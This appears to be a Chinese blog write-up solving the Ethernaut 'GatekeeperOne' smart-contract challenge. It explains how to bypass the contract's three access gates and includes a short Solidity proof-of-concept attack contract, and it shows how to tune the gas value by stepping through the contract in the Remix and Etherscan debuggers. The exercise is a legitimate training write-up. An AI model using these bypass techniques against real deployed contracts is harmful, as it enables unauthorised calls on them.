通过调试找到gas消耗 -ethernaut GatekeeperOne

最新推荐文章于 2022-10-24 23:58:24 发布
最新推荐文章于 2022-10-24 23:58:24 发布
阅读量1.1k 收藏 3
点赞数 1
文章标签: 区块链 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/d744486832/article/details/105371359
版权
通过调试找到gas消耗

1.在学习ethernaut的过程中,遇到了一个GatekeeperOne的题目,需要用到调试来查看gas的每一步消耗情况。当时找了很多writeup都是直接就出来了gas应该为多少,但是脑瓜子嗡嗡的,下面说一下我自己的解题过程

源代码:
pragma solidity ^0.4.18;

import 'openzeppelin-solidity/contracts/math/SafeMath.sol';

contract GatekeeperOne {

  using SafeMath for uint256;
  address public entrant;

  modifier gateOne() {      //要求tx.origin不等于请求者,通过其他合约调用实现绕过
    require(msg.sender != tx.origin);           
    _;
  }

  modifier gateTwo() {          //(存量gas)%8192=0
    require(msg.gas.mod(8191) == 0);
    _;
  }

  modifier gateThree(bytes8 _gateKey) {             //对bytes8的gatekey进行判断  
    require(uint32(_gateKey) == uint16(_gateKey));          //gatekey的前16位为0,后16位0x4bec
    require(uint32(_gateKey) != uint64(_gateKey));      //要求前面32位不能全是0,不然就相等了
    require(uint32(_gateKey) == uint16(tx.origin));     //uint32(_gatekey)==uint16(tx.origin)   则:uint32(_gatekey)==19436,即为0x4bec
    _;  
  }

  function enter(bytes8 _gateKey) public gateOne gateTwo gateThree(_gateKey) returns (bool) {
    entrant = tx.origin;
    return true;
  }
}
分析思路:

​ 首先给源代码进行一下必要的注释,了解大概的程序运行流程和各个函数起到的作用。通过简单的注释知道了要想通关需要执行enter函数然后返回true。那么就需要绕过上面的三个modifier。现在分开来说:

  • gateOne的绕过方式非常简单,通过其他合约来进行调用即可使得msg.sender和tx.origin不等

    假设用户通过合约A调用合约B:

    • 对于合约A:tx.origin和msg.sender都是用户
    • 对于合约B:tx.origin是用户,msg.sender是合约A的地址

  • gateTwo的原理也很简单,当执行到require时,剩余的gas是8191的倍数即可,但是如何找到剩余的这个值还是有一定问题的。

  • gateThree的绕过中主要是两个值的类型转换,一个是tx.origin(当用其他合约调用时,该值就是玩家的地址),_gateKey是需要构造的。最简单的方式是通过其他的脚本来进行计算。

    先从第三个require入手:

    pragma solidity ^0.4.18;
contract test{

address test = 0x970F89cBceba7dA88ACCb5817aFDbc530fC54bEC;/*自己的地址*/
uint32 public key = uint16(test);	/*即可得到key的32位无符号整型值,但是此时得到的是10进制的,转换成16进制即可。得到的结果其实就是自己地址的最后四位16进制值,此处我得到的是0x4bec*/
}

    然后第一二个require了解了类型转换还是很容易绕过的。

    第一个require得到后面的应该是0x00004bec ,由第二个require可以得到前面不能是全零。0x00100000和0x01000000都是可以的,1的位置可以随意放,也可以不是1。

    最终我的地址我得到了这样的一个gatekey:0x0010000000004bec

    因此可以得到一个这样的poc,在remix中编译并运行

    pragma  solidity ^0.4.18;

import "./gateone.sol";


contract GateKeeperOnePoc{
    
    GatekeeperOne gate = GatekeeperOne(0xc2647fd2d838617cba8a5c3d02dcfecfddb536b1);
    
    function hackGate() public{
        gate.call.gas(999999)(bytes4(keccak256('enter(bytes8)')),bytes8(0x0010000000004bec));	//此处的999999可以设置高一点,避免出现out of gas;
        
    }
}
    调试过程:

    由于在gateTwo的require中是用了msg.gas,因此需要在汇编中注意gas关键字。GAS关键字是获取执行可用的gas。由于EVM是栈虚拟机,因此此处需要注意获取到的gas后的dup2,dup2是将栈内的第2个元素(从栈顶向下算)移至栈顶。

    具体的gas数量获取如下:

    1. 先直接运行hackGate函数
      在这里插入图片描述
    2. 修改gas limit的值,可以先给高一点
      在这里插入图片描述
      在这里插入图片描述
  1. 然后确认等待执行。执行完成后可以看到一个debug,点击进入debug界面,在debug上面还有个链接也可以点进去看看。

在这里插入图片描述

通过etherscan查看gas的消耗

在这里插入图片描述
5. 找到其中的GAS和DUP2,然后看后面的gas数值是多少,然后和8191的倍数进行调整,最终得到一个数

在这里插入图片描述

961446 % 8191 = 3099

999999 - 3099 = 996900

  1. 利用该值然后再次执行hackGate函数。并调整gas limit为计算得到的996900

在这里插入图片描述

在这里插入图片描述

958395%8191 = 48

996900 - 48 = 996852
在这里插入图片描述
在这里插入图片描述

958348 % 8191 = 1

996852- 1 = 996851

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
可以看到没有再出现revert,且958347 % 8191 = 0;成功绕过第二个。
然后点击提交可以发现已经成功了。
在这里插入图片描述

通过remix的debug来查看

可以通过那两个小箭头来实现单步的调试,依旧是找GAS和DUP2后的值,然后不断的修改提交执行时的gaslimit。

在这里插入图片描述
remaining gas即为剩余的gas,依旧是和上面的过程是一样的。通过不断的修改gas limit的值,然后单步到这个位置,看剩余的gas为多少。如果为8191的倍数即可。

在这里插入图片描述

总被人叫程序员的安全工程师
关注
ethernaut GateKeeperOne
love_wjk的博客
08-13 391
通关要求: 通过三个限制函数,以entrant身份注册。 题目源码 pragma solidity ^0.5.0; import 'openzeppelin-solidity/contracts/math/SafeMath.sol'; contract GatekeeperOne { using SafeMath for uint256; address public entrant; modifier gateOne() { require(msg.sender != tx.o
ethernaut——GatekeeperOne
2301_78046362的博客
05-20 205
我计算gas大小的方法,先执行一次失败的交易,去etherscan中找到gasleft的时候gas消耗量,然后重新计算后输入正确的gas费用。如图所示,我输入的gas为200000,执行完gasleft()后还剩199744,消耗了256.
6. 游戏技能系统的调试 - Debugging GAS
xcinkey的博客
10-24 1049
GAS提供了一套调试的工具链,这套工具依赖于控制台命令和HUD显示,在当前状况下显得并不是是否的好用,但是了解其功能和内容还是是否有必要的。
以太坊如何估计计算gas
weixin_30719711的博客
04-21 783
以太坊如何估计估算计算gas?Etherscan上transaction info中有个gas used by txn,结果跟remix给的结果以及geth中getTransactionReceipt的gasUsed给的结果都会是一致的,可以直接用geth或是remix模拟估算gas cost。 之前一直没把这个问题搞清楚,所以干脆做个试验看一下. remix浏览器下方有个可执行的l...
以太坊智能合约学习笔记(二)
ChloverJ的博客
04-13 2856
在上一篇文章中,我们通过一个实例了解了一个以太坊智能合约的基本结构、语法与一些概念,接下来我们将对其进行补充。gas:当你激活一个智能合约的时候,你在要求整个网络内的每个矿工个体分别执行里面的运算。这会花费他们的时间和精力,Gas是你为这项服务向矿工们支付的机制。报酬是小额的以太币,想要运行智能合约的人的需要支付报酬来使合约工作。付款款项(单位以太币)= Gas数量(单位Gas) x Gas pr...
standardized-e-gas-monitoring-concept-for-gasoline-CN.pdf
09-29
根据提供的文件内容,我们可以提取出一系列有关E-Gas监控概念的技术知识点,具体如下: 1. E-Gas监测概念的标准化:E-Gas监控概念涉及汽油和柴油发动机控制单元的电子气体监测,主要是对发动机的电子控制单元(ECU...
Gas sensor array under dynamic gas mixtures-数据集
03-19
通过连续采集16个传感器阵列信号持续约12小时来构建每次测量,而不会中断。共享数据集的目的在于提供从化学传感器到传感器和人工智能研究社区的广泛而连续的时间序列,以制定和测试解决各种任务的策略。 ethylene_...
TencentOS tiny Hazardous gas detector-结构体
最新发布
09-06
结构体 结构体 结构体 结构体 结构体
Gas Blender-开源
07-01
Gas Blender 是一个 Python 程序,可帮助潜水员或气体混合器计算在技术潜水(Nitrox / Trimix)中混合气体的正确程序。
Ethernaut靶场实践(三)
m0_68764244的博客
10-10 1187
首先他要我们前十六位全为我们自己的地址,我们将自己的地址直接转换就可以了,第17-32位全为零,由于uint强转是从后面取,也就是十六进制的第9-12位全为零,而1-8位不全为零,因此我们构造出一个Bytes8的数据,并跟我们的数据进行与运算,即可满足要求。随后调用,然后一步步找到剩余的gas,我们需要找到区块链浏览器中的第二个gas操作,并取该gas-2的值,因为gasleft本身也会消耗gas,再与8191进行mod运算,在初始gas处减少响应的结果,重复2-3次,即可成功,提交实例,攻击完成。
以太坊gas值估计
weixin_34321753的博客
04-20 456
以太坊如何估计估算计算gas? Etherscan上transaction info中有个gas used by txn,结果跟remix给的结果以及geth中getTransactionReceipt的gasUsed给的结果都会是一致的,可以直接用geth或是remix模拟估算gas cost。 之前一直没把这个问题搞清楚,所以干脆做个...
remix Gas estimation failed
zgf1991 IT新人
05-29 5585
使用remix调用合约的approve方法给予授权,第一次没啥问题,之后都提示Gas estimation failed,以为gas给少了。 搞了一下午,后面注意到还有两个方法decreaseApproval,increaseApproval,发现使用后授权量有改变... 这个帖子给了点提示【Solidity】Gas estimation failed-Gas estimation erro...
如何在Remix环境下进行Solidity代码单步调试
weixin_34290096的博客
06-08 600
1 文章摘要 【本文目标】本文目标是指导如何使用REMIX完成一次智能合约交易调试。 【前置条件】学习过Solidity语言,需要进行调试。 【技术收获】 1). 使用REMIX进行单步调试 2). REMIX的Debugger界面介绍 2 开始调试 REMIX有2种方式启动调试。 新建一个智能合约文件”Donation.sol”,复制以下代码: contract Donation { a...
remix——智能合约部署到私有链上
第五清风的博客
11-05 3221
编写简单的合约 智能合约的代码(简单的数据存取) pragma solidity ^0.4.0; contract SimpleStorage { uint storedData; function set(uint x) public { storedData = x; } function get() public view returns ...
remix的使用
weixin_34198583的博客
08-27 1189
remix首先,这个东西其实是有一个线上版本的,只要登录上网址:https://remix.ethereum.org就可以直接使用了,但是我更多用的是本地配置的remix-ideremix-ide的文件夹在目录/wanghui/usr/local/lib/node_modules/下安装过程看——开始学习前的环境安装
此时在浏览器中输入http://localhost:8080访问就出来了打开以后...
新版Remix界面使用教程
qq_43175651的博客
09-11 8216
最近重拾solidity发现原来使用的Remix在经历大的版本更新后已经和网上的现有教程无法匹配,索性整理一下。 进入主页面后我们不需要理会右半边花哨的HOME界面,直接根据左边竖向排列的图标开始工作。 1.FILE EXPLORERS 选中后会发现Remix已经为你准备好了包含投票合约在内的三个经典智能合约供使用者测试。如果需要新建智能合约只需右键文件夹后选择“New File”即可创建一个新的合约。 2.SOLIDITY COMPILER 当你已经编写完自己的智能...
UE5 GAS 学习笔记 3.0 调试(Debug)
CloudHuCoding
06-14 1143
GAS拥有完备的调试系统,开发者可以利用这些调试办法来实时监测GAS的运行情况。
智能合约技术学习part2
weixin_45626617的博客
04-01 2337
智能合约技术学习part2 solidity语言 官方文档https://docs.soliditylang.org/en/v0.8.11/index.html 在线编译工具https://remix.ethereum.org 一、hello world 智能合约是面向对象的语言,拥有属性和行为两种常见的对象 //SPDX-License-Identifier:MIT pragma solidity ^0.5.0; contract helloworld{ string myname = "hel
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值